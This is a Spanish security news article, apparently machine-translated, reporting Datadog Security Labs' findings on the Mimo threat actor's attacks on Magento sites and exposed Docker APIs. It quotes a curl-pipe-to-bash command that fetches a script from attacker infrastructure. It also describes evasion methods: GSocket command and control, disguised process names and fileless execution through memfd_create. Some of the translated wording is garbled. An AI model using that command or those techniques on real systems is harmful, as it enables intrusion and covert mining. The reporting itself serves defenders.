El panorama de ciberseguridad enfrenta una nueva amenaza como el famoso actor de amenaza de Mimo, anteriormente conocido por apuntar a sistemas de gestión de contenido artesanal, ha desarrollado significativamente sus operaciones para comprometer las plataformas de comercio electrónico Magento.
Esta expansión representa un cambio peligroso hacia objetivos de alto valor donde la información de datos financieros se procesa de manera rutinaria, marcando una escalada preocupante en las actividades criminales del grupo.
La última campaña de Mimo demuestra capacidades técnicas sofisticadas, explotando vulnerabilidades de PHP-FPM indeterminadas para obtener acceso inicial a las instalaciones de Magento.
El actor de amenaza ha desarrollado una estrategia de monetización múltiple que combina minería tradicional de criptomonedas con robo de ancho de banda a través de redes proxy residenciales.
Este enfoque dual permite a los atacantes extraer el máximo valor de los sistemas comprometidos al tiempo que mantiene el acceso persistente a entornos de comercio electrónico valiosos.
Investigadores de Datadog Security Labs identificado Esta evolución durante las investigaciones sobre múltiples compromisos de carga de trabajo que afectan los sitios de comercio electrónico a lo largo de 2025.
El equipo de seguridad descubrió que Mimo no solo había ampliado su alcance objetivo, sino que también había introducido mecanismos de persistencia avanzados y técnicas de evasión sofisticadas que mejoran significativamente la seguridad operativa y la longevidad de la amenaza en los sistemas comprometidos.
Las operaciones del actor de amenaza se extienden más allá de las plataformas Magento, con investigadores descubriendo evidencia de compromisos de contenedores Docker a través de puntos finales de API de motores de Docker mal configurados.
Explotación de MIMO (Fuente – Datadog Security Labs)
Al dirigirse a los entornos de Docker, MIMO emplea el comando curl http: // (adversary-controlado-infraestructura) /cron.jpg?docker | Bash para iniciar la cadena de infecciones, demostrando la adaptabilidad del grupo en diversos tipos de infraestructura.
Mecanismos avanzados de persistencia y evasión
El avance táctico más significativo de MIMO implica la implementación de GSocket, una herramienta de prueba de penetración legítima, para establecer canales persistentes de comando y control.
Esta herramienta permite la comunicación encriptada a través de la red global de retransmisión de socket utilizando el cifrado AES-256-CBC, evitando efectivamente los firewalls y las barreras de traducción de direcciones de red que generalmente bloquearían el tráfico malicioso.
El malware emplea técnicas sofisticadas de disfraz de procesos, seleccionando nombres aleatorios de una lista codificada que incluye (KSTRP), (WatchDogd), (KSMD) y (KSWAPD0) para combinarse perfectamente con procesos legítimos de núcleos.
Quizás lo más preocupante sea la implementación de MIMO de Syscall MEMFD_CREATE (), que crea archivos temporales anónimos directamente en la memoria, lo que permite que el malware se ejecute completamente sin dejar artefactos del sistema de archivos tradicionales que las herramientas de seguridad típicamente monitorean.
Aumentar la detección, reducir la fatiga de alerta, acelerar la respuesta; Todo con una caja de arena interactiva construida para equipos de seguridad -> Prueba cualquiera.
